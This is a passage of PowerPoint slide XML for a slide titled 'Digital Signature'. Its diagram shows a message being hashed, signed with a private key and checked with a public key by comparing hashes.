        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4613708" y="2399548"/>
            <a:ext cx="931156" cy="846431"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="722931" y="629971"/>
            <a:ext cx="8190882" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Digital Signature</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="722931" y="2363971"/>
            <a:ext cx="931156" cy="846431"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="722931" y="2530048"/>
            <a:ext cx="931156" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Doctor</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Who?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724643" y="2061040"/>
            <a:ext cx="858754" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>Message</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="616215" y="3913595"/>
            <a:ext cx="1144587" cy="7143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t>Hash</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Algorithm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="2"/>
            <a:endCxn id="8" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188509" y="3210402"/>
            <a:ext cx="0" cy="703193"/>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2"/>
            <a:endCxn id="16" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188509" y="4627970"/>
            <a:ext cx="1712" cy="318290"/>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3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="724643" y="4946260"/>
            <a:ext cx="931156" cy="1111250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="722931" y="5071653"/>
            <a:ext cx="931156" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>€ÏÊÈ+Ã3/ËÚ~}W8ƒÆ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="702102" y="6025760"/>
            <a:ext cx="971102" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Hashed</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Message</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Straight Arrow Connector 18"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="16" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1655799" y="5501885"/>
            <a:ext cx="1624594" cy="0"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="Group 9"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="2241875" y="5488206"/>
            <a:ext cx="379422" cy="571858"/>
            <a:chOff x="4992" y="3072"/>
            <a:chExt cx="576" cy="1104"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Oval 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4992" y="3072"/>
              <a:ext cx="576" cy="384"/>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25" name="Oval 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5088"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26" name="Rectangle 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5232" y="3456"/>
              <a:ext cx="96" cy="72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27" name="Rectangle 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5328" y="3984"/>
              <a:ext cx="48" cy="4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28" name="Rectangle 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5328" y="4080"/>
              <a:ext cx="96" cy="4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grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="30" name="Straight Arrow Connector 29"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="90" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1654087" y="2704437"/>
            <a:ext cx="2959621" cy="73838"/>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5871240" y="2439583"/>
            <a:ext cx="1144587" cy="7143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t>Hash</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Algorithm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="39" name="Straight Arrow Connector 38"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="38" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5544864" y="2796770"/>
            <a:ext cx="326376" cy="1"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="44" name="Picture 43"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7460096" y="2262483"/>
            <a:ext cx="931156" cy="1111250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="TextBox 44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7458384" y="2387876"/>
            <a:ext cx="931156" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>€ÏÊÈ+Ã3/ËÚ~}W8ƒÆ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="TextBox 45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7618426" y="1689164"/>
            <a:ext cx="971102" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Hashed</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Message</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="47" name="Straight Arrow Connector 46"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="45" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7014115" y="2754277"/>
            <a:ext cx="444269" cy="49098"/>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1973943" y="5893238"/>
            <a:ext cx="1018227" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>Private Key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="TextBox 55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1908520" y="5148428"/>
            <a:ext cx="974696" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Encrypting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="72" name="Picture 71"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3280393" y="4987822"/>
            <a:ext cx="678656" cy="904875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="76" name="Picture 75"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4699960" y="4987244"/>
            <a:ext cx="678656" cy="904875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="77" name="Straight Arrow Connector 76"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="76" idx="3"/>
            <a:endCxn id="113" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5378616" y="5439682"/>
            <a:ext cx="2079768" cy="14957"/>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5736737" y="5828882"/>
            <a:ext cx="966931" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>Public Key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="TextBox 78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5643954" y="5115690"/>
            <a:ext cx="1012867" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Decrypting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="81" name="Group 15"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm rot="16200000">
            <a:off x="6042252" y="5385890"/>
            <a:ext cx="352477" cy="599237"/>
            <a:chOff x="2448" y="3072"/>
            <a:chExt cx="576" cy="1104"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="82" name="Oval 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2448" y="3072"/>
              <a:ext cx="576" cy="384"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="18605A"/>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83" name="Oval 17"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2544" y="3120"/>
              <a:ext cx="384"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84" name="Rectangle 18"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2688" y="3456"/>
              <a:ext cx="96" cy="720"/>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85" name="Rectangle 19"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2784" y="3984"/>
              <a:ext cx="48" cy="48"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="86" name="Rectangle 20"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2784" y="4080"/>
              <a:ext cx="96" cy="48"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="18605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ko-KR" altLang="en-US" sz="1200"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="TextBox 89"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4613708" y="2547442"/>
            <a:ext cx="931156" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Doctor</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Who?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="108" name="Straight Arrow Connector 107"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="72" idx="3"/>
            <a:endCxn id="76" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3959049" y="5439682"/>
            <a:ext cx="740911" cy="578"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="113" name="Picture 112"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7458384" y="4899014"/>
            <a:ext cx="931156" cy="1111250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="TextBox 113"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7456672" y="5024407"/>
            <a:ext cx="931156" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>€ÏÊÈ+Ã3/ËÚ~}W8ƒÆ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="TextBox 114"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7492017" y="5943913"/>
            <a:ext cx="858754" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>Hashed</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>Message</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="127" name="Straight Connector 126"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4232893" y="1779195"/>
            <a:ext cx="15875" cy="4749494"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:prstDash val="lgDash"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent6"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent6"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent6"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="TextBox 127"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3089552" y="1799277"/>
            <a:ext cx="736099" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SENDER</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="TextBox 128"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4607050" y="2157473"/>
            <a:ext cx="858754" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>Message</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="TextBox 129"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4437333" y="1803332"/>
            <a:ext cx="877163" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RECEIVER</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="131" name="Straight Arrow Connector 130"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="44" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7915893" y="3373733"/>
            <a:ext cx="9781" cy="345721"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="134" name="Straight Arrow Connector 133"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="113" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7915893" y="4445255"/>
            <a:ext cx="8069" cy="453759"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575" cmpd="sng">
            <a:tailEnd type="arrow"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="Rectangle 144"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6850363" y="3719454"/>
            <a:ext cx="2150621" cy="725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accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If those hashed messages are equal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>, the message transmitted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng" dirty="0"/>
              <a:t>properly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147" name="TextBox 146"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3179191" y="5876361"/>
            <a:ext cx="883325" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
